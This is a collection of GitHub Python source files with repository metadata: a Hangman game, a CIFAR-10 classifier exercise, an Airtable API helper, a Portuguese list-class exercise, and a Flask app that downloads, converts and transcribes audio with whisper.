  def __init__(self, word_list, num_lives):\n        pass\n        self.word = random.choice(word_list)\n        self.word_guessed = [\"_\" * len(self.word)]\n        self.num_letters = len(set(self.word))\n        self.num_lives = num_lives\n        self.word_list = word_list\n        self.list_of_guesses = []\n        #self.word_guessed2 = []\n\n        print(f\"The mystery word has {len(self.word)} characters\")\n        print(self.word_guessed)\n\n\n    #creating method for checking letter\n    def check_guess(self, guess):\n        \n        #guess = guess.lower() #redundant\n        \n        if guess in self.word:\n            print(f\"Good guess! {guess} is in the word.\")\n            \"\"\"for i in range(len(self.word)):\n                if self.word[i]==guess:\n                    \n                    self.word_guessed.append(guess)\n            print(self.word_guessed)\"\"\"\n            for x, element in enumerate(self.word_guessed):\n                if guess == element:\n                    self.word_guessed[x] = element\n            \n            #self.word_guessed2 = ' '.join(self.word_guessed)\n            print(self.word_guessed)\n            self.num_letters -=1\n        else:\n            self.num_lives -=1\n            print(f\"Sorry, {guess} is not in the word. Try again\")\n            print(f\"You have {self.num_lives} tries left\")\n\n        self.list_of_guesses.append(guess)\n\n    #method for input\n    def ask_for_input(self):\n        pass\n        s = set(string.ascii_lowercase) #making a set of lower case alphabets for the elif statements\n        while True:\n            guess = input(\"Please enter a character \")\n            guess = guess.lower() #converting into lowercase letters to compare to s\n            if len(guess)!=1:\n                print(\"Invalid letter. Please, enter a single alphabetical character\")\n            elif guess not in s:\n                print(\"Invalid letter. Please, enter a single alphabetical character\")\n            elif guess in self.list_of_guesses:\n                print(\"You already tried that letter!\")\n                print(f\"The letters that you've tried are {self.list_of_guesses}\")\n            else:\n                print(f\"Your guess is {guess} \")\n                #self.list_of_guesses.append(guess)\n                self.check_guess(guess)\n                break\n    \n    #ask_for_input()\n\ndef play_game(word_list, num_lives):\n    \n    game = Hangman(word_list, num_lives)\n    while True:\n        if game.num_lives == 0:\n            print(\"you lost!\")\n            print(f\"The word was {game.word}\")\n            break\n        elif game.num_letters > 0:\n            game.ask_for_input()\n        elif not game.num_letters >0 and game.num_lives != 0:\n            print(\"congratulations\")\n            print(f\"The word was {game.word}\")\n            break\n        else:\n            break\n\n\nif __name__ == '__main__':\n    while True:\n        difficulty = int(input(\"Welcome to Hangman! Please Choose a difficulty - \\n Enter 1 for easy \\n Enter 2 for medium \\n enter 3 for hard\"))\n\n        if difficulty == 1:\n            word_list = ['apple', 'banana', 'orange', 'pear', 'strawberry', 'watermelon']\n            play_game(word_list, num_lives=5)\n            break\n        elif difficulty == 2:\n            word_list = ['switzerland', 'florence', 'lucknow']\n            play_game(word_list, num_lives=4)\n            break\n        elif difficulty == 3:\n            word_list = ['flabbergasted', 'indestructible']\n            play_game(word_list, num_lives=3)\n            break\n        else:\n            print(\"Invalid input\")\n    \n\n    \n    \"\"\"\"\n    while True:\n        play_again = input(\"Please enter Y to play again at the same difficulty \\n Enter N to exit the game \\n if you want to change the difficulty please exit and re-start the game: \\n \").lower()\n        if play_again == 'y':\n            play_game(word_list, num_lives, j)\n            \n        elif play_again == 'n':\n            print(\"Goodbye!\")\n            break\n        else:\n            print(\"Invalid input\")\n\"\"\"\n    \n\n\n# %%\n","repo_name":"anany14/Hangman","sub_path":"rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
Please Choose a difficulty - \\n Enter 1 for easy \\n Enter 2 for medium \\n enter 3 for hard\"))\n\n if difficulty == 1:\n word_list = ['apple', 'banana', 'orange', 'pear', 'strawberry', 'watermelon']\n play_game(word_list, num_lives=5)\n break\n elif difficulty == 2:\n word_list = ['switzerland', 'florence', 'lucknow']\n play_game(word_list, num_lives=4)\n break\n elif difficulty == 3:\n word_list = ['flabbergasted', 'indestructible']\n play_game(word_list, num_lives=3)\n break\n else:\n print(\"Invalid input\")\n \n\n \n \"\"\"\"\n while True:\n play_again = input(\"Please enter Y to play again at the same difficulty \\n Enter N to exit the game \\n if you want to change the difficulty please exit and re-start the game: \\n \").lower()\n if play_again == 'y':\n play_game(word_list, num_lives, j)\n \n elif play_again == 'n':\n print(\"Goodbye!\")\n break\n else:\n print(\"Invalid input\")\n\"\"\"\n \n\n\n# %%\n","repo_name":"anany14/Hangman","sub_path":"rough.py","file_name":"rough.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74751358224","text":"#######################\n# COMP432 - G01\n# Part 3 - Interpretability\n# INCOMPLETE - Models built, but no comparison\n#######################\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\n\nimport torch\nfrom torchsummary import summary\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\ntrain_size = 0.8\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\n\n# Creating an instance\ndd = unpickle('Datasets/data_batch_1')\n\n# Showing the first image from data\nimg = dd[b'data'][0]\nimg.shape = (32, 32, 3)\nplt.imshow(img)\n\n# Reshaping the data and showing the result\nimg = img.reshape(3, 32, 32).transpose(1, 2, 0)\nplt.imshow(img)\n\nX = dd[b'data']\nY = np.array(dd[b'labels'])\nY.shape\n\n# In the first step we will split the data in training and remaining dataset\nx_train, x_test, y_train, y_test = train_test_split(X, Y, train_size=train_size)\n\n## Model-Creation,Training & Visualization\ndc = DecisionTreeClassifier(max_depth=100, random_state=0, splitter='random')\ndc.fit(x_train, y_train)\n\n\ndef train_estimators(X, y, estimator_type, **kwargs):\n clf = estimator_type(random_state=0, **kwargs)\n clf.fit(X, y)\n return clf\n\n\ndef plot_estimator_scores(estimator, **kwargs):\n \"\"\"\n Plots the training, validation, and testing scores of a list of estimators,\n where `param_name` and `param_vals` are the same as for `train_estimators`.\n The estimator with best validation score will be highlighted with an 'x'.\n \"\"\"\n # Your implementation here. Use as many lines as you need. 
\n x = 1\n list_tr = []\n list_tst = []\n list_val = []\n list_par_val = []\n estimtr = 0\n s = -4\n s1 = -2\n for i in range(1, 6):\n if estimator == DecisionTreeClassifier or estimator == RandomForestClassifier:\n estimtr = train_estimators(x_train, y_train, estimator, max_depth = i*5*x)\n elif estimator == LogisticRegression:\n estimtr = train_estimators(x_train, y_train, estimator, C=10**s,max_iter=10000)\n s = s + 1\n elif estimator == SVC:\n estimtr = train_estimators(x_train, y_train, estimator, C=10**s1,max_iter=10000,gamma=0.001)\n s1 = s1 + 1\n\n list_tr.append(score_estimators(x_train, y_train, estimtr))\n list_tst.append(score_estimators(x_test, y_test, estimtr))\n list_par_val.append(i * 5 * x)\n x = x + 1\n\n plt.plot(list_par_val, list_tr, label='training')\n plt.scatter(list_par_val, list_tr,)\n plt.plot(list_par_val, list_tst, label='testing')\n plt.scatter(list_par_val, list_tst)\n\n plt.legend()\n return list_tr, list_tst, list_val\n\n\ndef score_estimators(X, y, estimator):\n \"\"\"Scores each estimator on (X, y), returning a list of scores.\"\"\"\n # Your implementation here. Aim for 1-4 lines.\n return estimator.score(X, y)\n\n\nplot_estimator_scores(DecisionTreeClassifier)\n\n\n## Convolution Neural Network\n# number of subprocesses to use for data loading\nnum_workers = 0\n# how many samples per batch to load\nbatch_size = 20\n# percentage of training set to use as validation\nvalid_size = 0.2\n\n# convert data to a normalized torch.FloatTensor\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n# choose the training and test datasets\ntrain_data = datasets.CIFAR10('data', train=True,\n download=True, transform=transform)\ntest_data = datasets.CIFAR10('data', train=False,\n download=True, transform=transform)\n\n# obtain training indices that will be used for validation\nnum_train = len(train_data)\nindices = list(range(num_train))\nnp.random.shuffle(indices)\nsplit = int(np.floor(valid_size * num_train))\ntrain_idx, valid_idx = indices[split:], indices[:split]\n\n# define samplers for obtaining training and validation batches\ntrain_sampler = SubsetRandomSampler(train_idx)\nvalid_sampler = SubsetRandomSampler(valid_idx)\n\n# prepare data loaders (combine dataset and sampler)\ntrain_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size, sampler=train_sampler, num_workers=num_workers)\nvalid_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size, sampler=valid_sampler, num_workers=num_workers)\ntest_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size, num_workers=num_workers)\n\n# specify the image classes\nclasses = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\ntrain_on_gpu = False\n\n\n# define the CNN architecture\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # convolutional layer (sees 32x32x3 image tensor)\n self.conv1 = nn.Conv2d(3, 16, 3, padding=1)\n # convolutional layer (sees 16x16x16 tensor)\n self.conv2 = nn.Conv2d(16, 32, 3, padding=1)\n # convolutional layer (sees 8x8x32 tensor)\n self.conv3 = nn.Conv2d(32, 64, 3, padding=1)\n # max pooling layer\n self.pool = nn.MaxPool2d(2, 2)\n # linear layer (64 * 4 * 4 -> 500)\n self.fc1 = nn.Linear(64 * 4 * 4, 500)\n # linear layer (500 -> 10)\n self.fc2 = nn.Linear(500, 10)\n # dropout layer (p=0.25)\n self.dropout = nn.Dropout(0.25)\n\n def forward(self, x):\n # add sequence of convolutional and max pooling 
layers\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = self.pool(F.relu(self.conv3(x)))\n # flatten image input\n x = x.view(-1, 64 * 4 * 4)\n # add dropout layer\n x = self.dropout(x)\n # add 1st hidden layer, with relu activation function\n x = F.relu(self.fc1(x))\n # add dropout layer\n x = self.dropout(x)\n # add 2nd hidden layer, with relu activation function\n x = self.fc2(x)\n return x\n\n# create a complete CNN\nmodel = Net()\nprint(model)\n\n# move tensors to GPU if CUDA is available\nif train_on_gpu:\n model.cuda()\n\nsummary(model, (3, 32, 32))\n\n# specify loss function (categorical cross-entropy)\ncriterion = nn.CrossEntropyLoss()\n\n# specify optimizer\noptimizer = optim.SGD(model.parameters(), lr=0.01)\n\n\n## Train the Network\n# Remember to look at how the training and validation loss decreases over time; if the validation loss ever increases it indicates possible overfitting. (In fact, in the below example, we could have stopped around epoch 33 or so!)\n# number of epochs to train the model\nn_epochs = 20\n\n# track change in validation loss\nvalid_loss_min = np.Inf\n\nfor epoch in range(1, n_epochs + 1):\n # keep track of training and validation loss\n train_loss = 0.0\n valid_loss = 0.0\n \n ###################\n # train the model #\n ###################\n model.train()\n for data, target in train_loader:\n\n optimizer.zero_grad()\n # forward pass: compute predicted outputs by passing inputs to the model\n output = model(data)\n # calculate the batch loss\n loss = criterion(output, target)\n # backward pass: compute gradient of the loss with respect to model parameters\n loss.backward()\n # perform a single optimization step (parameter update)\n optimizer.step()\n # update training loss\n train_loss += loss.item() * data.size(0)\n\n ###################### \n # validate the model #\n ######################\n model.eval()\n for data, target in valid_loader:\n\n output = model(data)\n # calculate the batch loss\n loss = criterion(output, target)\n # update average validation loss\n valid_loss += loss.item() * data.size(0)\n\n # calculate average losses\n train_loss = train_loss / len(train_loader.sampler)\n valid_loss = valid_loss / len(valid_loader.sampler)\n\n # print training/validation statistics\n print('Epoch: {} \\tTraining Loss: {:.6f} \\tValidation Loss: {:.6f}'.format(epoch, train_loss, valid_loss))\n\n # save model if validation loss has decreased\n if valid_loss <= valid_loss_min:\n print('Validation loss decreased ({:.6f} --> {:.6f}). Saving model ...'.format(valid_loss_min, valid_loss))\n torch.save(model.state_dict(), 'model_cifar.pt')\n valid_loss_min = valid_loss\n\n\n# ## Test the Trained Network\n# Test your trained model on previously unseen data! A \"good\" result will be a CNN that gets around 70% (or more, try your best!) accuracy on these test images.\n# track test loss\ntest_loss = 0.0\nclass_correct = list(0. for i in range(10))\nclass_total = list(0. 
for i in range(10))\nmodel.eval()\n# iterate over test data\nfor data, target in test_loader:\n # move tensors to GPU if CUDA is available\n if train_on_gpu:\n data, target = data.cuda(), target.cuda()\n # forward pass: compute predicted outputs by passing inputs to the model\n output = model(data)\n # calculate the batch loss\n loss = criterion(output, target)\n # update test loss\n test_loss += loss.item() * data.size(0)\n # convert output probabilities to predicted class\n _, pred = torch.max(output, 1)\n # compare predictions to true label\n correct_tensor = pred.eq(target.data.view_as(pred))\n correct = np.squeeze(correct_tensor.numpy()) if not train_on_gpu else np.squeeze(correct_tensor.cpu().numpy())\n # calculate test accuracy for each object class\n for i in range(len(target)):  # len(target) rather than batch_size, so a short final batch cannot raise an IndexError\n label = target.data[i]\n class_correct[label] += correct[i].item()\n class_total[label] += 1\n\n# average test loss\ntest_loss = test_loss / len(test_loader.dataset)\nprint('Test Loss: {:.6f}\\n'.format(test_loss))\n\nfor i in range(10):\n if class_total[i] > 0:\n print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % (\n classes[i], 100 * class_correct[i] / class_total[i],\n np.sum(class_correct[i]), np.sum(class_total[i])))\n else:\n print('Test Accuracy of %5s: N/A (no training examples)' % (classes[i]))\n\nprint('\\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % (\n 100. * np.sum(class_correct) / np.sum(class_total),\n np.sum(class_correct), np.sum(class_total)))\n","repo_name":"kyivedwards/MLAlgorithmComparator","sub_path":"Classifier interpretability/interpretability.py","file_name":"interpretability.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33906956134","text":"import requests\nfrom django.core.exceptions import PermissionDenied\n\nfrom seqr.utils.logging_utils import SeqrLogger\nfrom seqr.views.utils.terra_api_utils import is_google_authenticated\n\nfrom settings import AIRTABLE_API_KEY, AIRTABLE_URL\n\nlogger = SeqrLogger(__name__)\n\nPAGE_SIZE = 100\nMAX_OR_FILTERS = PAGE_SIZE - 5\n\n\nclass AirtableSession(object):\n\n RDG_BASE = 'RDG'\n ANVIL_BASE = 'AnVIL'\n AIRTABLE_BASES = {\n RDG_BASE: 'app3Y97xtbbaOopVR',\n ANVIL_BASE: 'appUelDNM3BnWaR7M',\n }\n\n def __init__(self, user, base=RDG_BASE):\n self._user = user\n self._check_user_access(base)\n self._url = f'{AIRTABLE_URL}/{self.AIRTABLE_BASES[base]}'\n\n self._session = requests.Session()\n self._session.headers.update({'Authorization': f'Bearer {AIRTABLE_API_KEY}'})\n\n def _check_user_access(self, base):\n has_access = is_google_authenticated(self._user)\n if base != self.ANVIL_BASE:\n has_access &= self._user.email.endswith('broadinstitute.org')\n if not has_access:\n raise PermissionDenied('Error: To access airtable user must login with Google authentication.')\n\n def safe_create_record(self, record_type, record):\n try:\n response = self._session.post(f'{self._url}/{record_type}', json={'records': [{'fields': record}]})\n response.raise_for_status()\n except Exception as e:\n logger.error(f'Airtable create \"{record_type}\" error: {e}', self._user)\n\n def fetch_records(self, record_type, fields, or_filters):\n self._session.params.update({'fields[]': fields, 'pageSize': PAGE_SIZE})\n filter_formulas = []\n for key, values in or_filters.items():\n filter_formulas += [f\"{key}='{value}'\" for value in sorted(values)]\n records = {}\n for i in range(0, len(filter_formulas), MAX_OR_FILTERS):\n filter_formula_group = filter_formulas[i:i + MAX_OR_FILTERS]\n self._session.params.update({'filterByFormula': 
f'OR({\",\".join(filter_formula_group)})'})\n logger.info(f'Fetching {record_type} records {i}-{i + len(filter_formula_group)} from airtable', self._user)\n self._populate_records(record_type, records)\n logger.info('Fetched {} {} records from airtable'.format(len(records), record_type), self._user)\n return records\n\n def _populate_records(self, record_type, records, offset=None):\n response = self._session.get(f'{self._url}/{record_type}', params={'offset': offset} if offset else None)\n response.raise_for_status()\n try:\n response_json = response.json()\n records.update({record['id']: record['fields'] for record in response_json['records']})\n except (ValueError, KeyError) as e:\n raise Exception(f'Unable to retrieve airtable data: {e}')\n\n if response_json.get('offset'):\n self._populate_records(record_type, records, offset=response_json['offset'])\n\n\n","repo_name":"populationgenomics/seqr","sub_path":"seqr/views/utils/airtable_utils.py","file_name":"airtable_utils.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"20963978240","text":"#Solution to the Lists exercise\n\nclass Lista:\n '''List of products implemented with arrays.'''\n def __init__(self, TAM=5):\n self.TAM = TAM\n #Elements of the list\n # Initially: [None, None, None, ... None]\n self.__elems = [None]*TAM\n #Last index (also the number of stored elements)\n self.__ultimo = 0\n\n def adicionar(self, P):\n ''' Insert a product at the end of the list.'''\n\n tamanho = len(self.__elems)\n if self.__ultimo >= tamanho:\n #The list is out of space\n print(\"The list needs more space\")\n # Create a new array\n elems = [None] * (tamanho + self.TAM)\n # Copy the elements\n self.__copiar(elems)\n # the new array is elems\n self.__elems = elems\n\n #Insert the element\n self.__elems[self.__ultimo] = P\n self.__ultimo += 1\n\n\n def __copiar(self, elems):\n '''Helper method to copy the products.'''\n #There is a more \"Pythonic\" way to do this... 
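with enumerate; a minimal sketch of that variant (illustrative only, same behavior as the loop kept below):\n #   for i, elem in enumerate(self.__elems):\n #       elems[i] = elem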
\n for i in range(len(self.__elems)):\n elems[i] = self.__elems[i]\n\n def tamanho(self):\n ''' Return the number of elements in the list.'''\n return self.__ultimo\n\n def elemento(self, pos=0):\n '''Return the element at position pos.'''\n if pos < 0 or pos >= self.__ultimo:\n print(\"Invalid position\")\n return None\n else:\n return self.__elems[pos]\n\n def __str__(self):\n s = \"[\"\n i = 0\n while i < self.__ultimo:\n s += str(self.__elems[i])\n if i < self.__ultimo - 1:\n s += \", \"\n i += 1\n s += \"]\"\n return s\n\n def remover(self, pos):\n '''Remove the element at position pos.'''\n if pos < 0 or pos >= self.__ultimo:\n print(\"Invalid position\")\n return\n\n #Shift the remaining elements left\n for i in range(pos, self.__ultimo - 1):\n self.__elems[i] = self.__elems[i+1]\n\n self.__ultimo -= 1\n self.__elems[self.__ultimo] = None\n\n def reset(self):\n '''Remove all elements.'''\n for i in range(self.__ultimo):\n self.__elems[i] = None\n self.__ultimo = 0\n\n def copiar(self):\n '''Create a copy of the list.'''\n L = Lista()\n for i in range(self.__ultimo):\n L.adicionar(self.__elems[i])\n\n return L\n\n def __add__(self, L):\n '''Concatenate two lists.'''\n L2 = self.copiar()\n for i in range(L.__ultimo):\n L2.adicionar(L.__elems[i])\n return L2\n\n def reverso(self):\n '''Return the reverse of the list.'''\n L = self.copiar()\n for i in range(L.__ultimo // 2):\n v = L.__elems[i]\n L.__elems[i] = L.__elems[L.__ultimo - i - 1]\n L.__elems[L.__ultimo - i - 1] = v\n return L\n\n\nL1 = Lista()\nL2 = Lista()\nfor i in range(10):\n L1.adicionar(i)\n L2.adicionar(i*2)\n\nprint(L1)\nL1a = L1.reverso()\nprint(L1a)\nprint(L2)\nL3 = L1 + L2\nprint(L3)\nL3.remover(6)\nprint(L3)\nL3.remover(18)\nprint(L3)\nL4 = Lista()\nL4.adicionar(5)\nL4.remover(0)\nprint(L4)\n\n","repo_name":"MarcusSilva3298/object-oriented-programming","sub_path":"Material das aulas/Aula 5 - Estrutudas de dados I - Listas, pilhas filas, etc/Resolução do Exercício.py","file_name":"Resolução do Exercício.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71650633106","text":"import asyncio\nimport os\nimport re\nimport subprocess\nimport uuid\nfrom asyncio.subprocess import PIPE\nfrom datetime import timedelta\n\nfrom flask import (Flask, Response, redirect, render_template, request,\n send_file, stream_with_context)\nfrom flask_cors import CORS\n\nfrom speaker_diff import StandardizeOutput\nfrom whisperlog import setup_logger\n\napp = Flask(\"PODV2T\")\napp.config['SESSION_TYPE'] = 'filesystem'\napp.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=60)\nCORS(app, send_wildcard=True, resources={r\"/*\": {\"origins\": \"*\"}})\n\nBASE_PATH = os.getcwd()\nMODELS_PATH = os.path.join(BASE_PATH, 'models')\nMODEL_PATH = os.path.join(MODELS_PATH, 'ggml-model-whisper-base.en.bin')\nWHISPER_BINARY = os.path.join(BASE_PATH, 'bin', 'main')\nMEDIA_PATH = os.path.join(BASE_PATH, 'media')\n\nlog_file = os.path.join(os.getcwd(), 'app.log')\n\nlogger = setup_logger('app', log_file)\n\nif not os.path.exists(MEDIA_PATH):\n os.makedirs(MEDIA_PATH)\n\n\ndef run_subprocess(args, tempfile):\n proc = None\n try:\n logger.info(\"Running subprocess %s\", args)\n proc = subprocess.Popen(args, stdout=subprocess.PIPE)\n for line in iter(proc.stdout.readline, b''):\n if not line:\n break\n if line.startswith(b\"[\"):\n line = line.decode(\"utf8\").strip().split(\"]\")[1]\n logger.info(\"line: %s\", line)\n tempfile.write(line)\n yield f\"{line}\"\n else:\n continue\n except Exception as e:\n logger.error(\"An error occurred while running subprocess %s: %s\", args, e)\n finally:\n if proc:\n logger.info(\"Terminating subprocess\")\n proc.terminate()\n\n\ndef transcribe_audio(wav_file, 
csv_file):\n args = [WHISPER_BINARY, \"-m\", MODEL_PATH, \"-ocsv\", \"-f\", wav_file, \"-of\", csv_file]\n try:\n with open(os.path.join(MEDIA_PATH, f'transcript_{uuid.uuid4()}.txt'), \"a\", encoding=\"utf-8\") as tmp_file:\n logger.info(f\"Transcribing {wav_file} to {csv_file}\")\n logger.debug(f\"Running command: {' '.join(args)}\")\n logger.debug(\"Command output:\")\n yield from run_subprocess(args, tmp_file)\n except Exception as e:\n logger.error(\"An error occurred while transcribing audio for file %s: %s\", wav_file, e)\n raise # This will raise the exception to the calling function\n else:\n logger.info(\"Transcription complete\")\n\n\ndef transcript_generator(uuid_str):\n temp_dir = \"media\"\n base_file_name = f\"{temp_dir}/{uuid_str}\"\n wav_file_path = f\"{base_file_name}.wav\"\n csv_file_path = f\"{MEDIA_PATH}/{uuid_str}.csv\"\n\n try:\n yield \"Transcribing audio...\\n\"\n with open(os.path.join(temp_dir, f'transcript_{uuid.uuid4()}.txt'), \"a\", encoding=\"utf-8\") as tmp_file:\n yield from transcribe_audio(wav_file_path, csv_file_path)\n speaker_diar = StandardizeOutput(wav_file_path=wav_file_path, csv_file_path=csv_file_path)\n speaker_diar.get_standardized_output()\n yield f\"Speaker diff output:\\n{speaker_diar.final_output}\\n\"\n except Exception as e:\n logger.error(\"An error occurred while transcribing audio for file %s: %s\", uuid_str, e)\n raise # This will raise the exception to the calling function\n else:\n yield f\"\\nTranscribed: http://localhost:8833/download/{uuid_str}.csv\"\n finally:\n if os.path.exists(wav_file_path):\n os.remove(wav_file_path)\n if os.path.exists(csv_file_path):\n os.remove(csv_file_path)\n with open(os.path.join(temp_dir, f'transcript_{uuid.uuid4()}.txt'), \"a\", encoding=\"utf-8\") as tmp_file:\n tmp_file.write(\"\\n\")\n\n\n@app.route('/transcribe', methods=[\"GET\", \"POST\"])\ndef transcription():\n gen_uuid_str = request.query_string.split(b'=')[1].decode('utf-8').split('.')[0]\n logger.info(f\"gen_uuid_str: {gen_uuid_str}\")\n return Response(stream_with_context(transcript_generator(gen_uuid_str)))\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == 'GET':\n return render_template('index.html')\n\n\n@app.route('/t', methods=['GET', 'POST'])\nasync def upload_file():\n if request.method == 'POST':\n try:\n file = request.files['file']\n file_name = file.filename\n ext = re.search(r'\\.([a-zA-Z0-9]+)$', file_name).group(1)\n uuid_str = str(uuid.uuid4())\n file_new = f\"{uuid_str}.{ext}\"\n file_converted = f\"{uuid_str}.wav\"\n file.save(os.path.join('media', file_new))\n logger.info(\"\\033[43mSAVED %s to %s!\\033[0m\", file_name, file_new)\n\n p1 = await asyncio.create_subprocess_exec(\n \"ffprobe\",\n \"-v\",\n \"error\",\n \"-select_streams\",\n \"a:0\",\n \"-show_entries\",\n \"stream=codec_name:stream_tags=language\",\n \"-of\",\n \"default=noprint_wrappers=1:nokey=1\",\n f'media/{file_new}',\n stdout=PIPE,\n )\n codec = await p1.stdout.read()\n codec = codec.decode(\"utf8\").strip()\n logger.info(\"codec is %s\", codec)\n if codec != 'pcm_mulaw':\n logger.info('CONVERTING FILE TO WAV....')\n process_convert = await asyncio.create_subprocess_exec(\n \"ffmpeg\",\n \"-loglevel\",\n \"panic\",\n \"-i\",\n f\"media/{file_new}\",\n \"-y\",\n \"-probesize\",\n \"32\",\n \"-ar\",\n \"16000\",\n \"-ac\",\n \"1\",\n \"-acodec\",\n \"pcm_s16le\",\n f\"media/{file_converted}\",\n )\n await process_convert.communicate()\n logger.info('CONVERTED FILE TO WAV!')\n os.remove(f\"media/{file_new}\")\n\n 
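# Hand the converted wav off to the streaming /transcribe endpoint.\n 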
return redirect(f\"/transcribe?file={file_converted}\")\n except Exception as e:\n logger.error(\"file not found ... %s\", e)\n return redirect('/')\n\n\n@app.route('/url', methods=[\"GET\", \"POST\"])\ndef tr_url():\n def gen():\n source_url = request.form.get('url')\n temp_dir = os.path.join(os.getcwd(), 'media')\n if not os.path.exists(temp_dir):\n os.mkdir(temp_dir)\n\n uuid_str = str(uuid.uuid4())\n base_file_name = f\"{temp_dir}/{uuid_str}\"\n yield f\"Downloading media.... {source_url}\"\n subprocess.run(\n [\n \"yt-dlp\",\n \"-f\",\n \"bestaudio[ext=m4a]/best[ext=mp4]/best\",\n \"--xattrs\",\n f\"{source_url}\",\n \"-o\",\n f\"{base_file_name}.mp4\",\n ]\n )\n yield \"Extracting Audio and Resampling...\"\n logger.info(\"Extracting audio and resampling...\")\n subprocess.run(\n [\n \"ffmpeg\",\n \"-i\",\n f\"{base_file_name}.mp4\",\n \"-hide_banner\",\n \"-loglevel\",\n \"error\",\n \"-ar\",\n \"16000\",\n \"-ac\",\n \"1\",\n \"-c:a\",\n \"pcm_s16le\",\n \"-y\",\n f\"{base_file_name}.wav\",\n ]\n )\n logger.info(\"Transcribing...\")\n yield \"Transcribing audio...\"\n proc = subprocess.Popen(\n [\n WHISPER_BINARY,\n \"-m\",\n MODEL_PATH,\n \"-ocsv\",\n \"-f\",\n f\"{base_file_name}.wav\",\n \"-t\",\n \"8\",\n \"-of\",\n f\"media/{uuid_str}\",\n ],\n stdout=subprocess.PIPE,\n )\n transcript_file = open(f\"{temp_dir}/transcript_{uuid_str}.txt\", \"a\", encoding=\"utf-8\")\n\n # Generator for the transcript\n for line in iter(proc.stdout.readline, b''):\n if not line:\n yield f\"{uuid_str}.csv\"\n break\n if line.startswith(b\"[\"):\n line = line.decode(\"utf8\").strip().split(\"]\")[1]\n transcript_file.write(line)\n yield f\"{line}\"\n else:\n continue\n transcript_file.close()\n # Run speaker_diff\n wav_file_path = f\"{base_file_name}.wav\"\n csv_file_path = f\"{base_file_name}.csv\"\n speaker_diar = StandardizeOutput(wav_file_path=wav_file_path, csv_file_path=csv_file_path)\n speaker_diar.get_standardized_output()\n\n return Response(stream_with_context(gen()))\n\n\n@app.route('/download/<uuid_str>/<transcription_type>', methods=[\"GET\"])\ndef download_file(uuid_str, transcription_type):\n temp_dir = os.path.join(os.getcwd(), 'media')\n if transcription_type == \"w\":\n return send_file(f\"{temp_dir}/{uuid_str}.wav\", as_attachment=True)\n if transcription_type == \"f\":\n return send_file(f\"{temp_dir}/transcript_{uuid_str}.txt\", as_attachment=True)\n if transcription_type == \"x\":\n return send_file(f\"{temp_dir}/{uuid_str}.fo.txt\", as_attachment=True)\n if transcription_type == \"r\":\n return send_file(f\"{temp_dir}/{uuid_str}.rttm\", as_attachment=True)\n if transcription_type == \"c\":\n return send_file(f\"{temp_dir}/{uuid_str}.csv\", as_attachment=True)\n\n\n@app.route('/static/styles.css', methods=[\"GET\"])\ndef styles():\n return render_template('styles.css')\n\n\nif __name__ == '__main__':\n logger.info('Starting server...')\n port = int(os.environ.get('PORT') if os.environ.get('PORT') is not None else 8833)\n app.run(debug=False, port=port)\n\n'''\n\ndef download_and_resample_audio(source_url, base_file_name):\n \"\"\"\n Download the audio file from the specified source URL, resample it to 16kHz\n and convert it to a WAV file.\n\n Args:\n source_url (str): The URL of the source audio file.\n base_file_name (str): The base filename for the downloaded and converted files.\n\n Returns:\n None\n \"\"\"\n subprocess.run(\n ['yt-dlp', '-f', 'bestaudio[ext=m4a]/best[ext=mp4]/best', '--xattrs', source_url, '-o', f'{base_file_name}.mp4']\n )\n subprocess.run(\n [\n 'ffmpeg',\n '-i',\n f'{base_file_name}.mp4',\n '-hide_banner',\n 
'-loglevel',\n 'error',\n '-ar',\n '16000',\n '-ac',\n '1',\n '-c:a',\n 'pcm_s16le',\n '-y',\n f'{base_file_name}.wav',\n ]\n )\n logger.info(\"Resampled audio\")\n\n\ndef generate(proc, tmp_file):\n for line in iter(proc.stdout.read, ''):\n if not line:\n break\n if line.startswith(b\"output_csv:\"):\n break\n if not line.startswith(b\"whisper_\") and not line.startswith(b\"main:\"):\n line = line.decode(\"utf8\").strip()\n tmp_file.write(line)\n tmp_file.write(\"\\n\")\n yield f\"{line}\"\n else:\n continue\n\n\ndef generate_with_ts(proc, tmp_file):\n for line in iter(proc.stdout.readline, ''):\n if line.startswith(b\"[\"):\n line = line.decode(\"utf8\").strip()\n tmp_file.write(line)\n tmp_file.write(\"\\n\")\n yield f\"{line}\"\n if not line:\n break\n else:\n continue\n\n# def transcribe_audio(base_file_name, uuid_str):\n# proc = subprocess.Popen(\n# [WHISPER_BINARY, '-m', MODEL_PATH, '-ocsv', '-f', f'{base_file_name}.wav', '-of', f'{MEDIA_PATH}/{uuid_str}'],\n# stdout=subprocess.PIPE,\n# )\n# transcript_file = open(f\"{MEDIA_PATH}/transcript_{uuid_str}.txt\", \"a\", 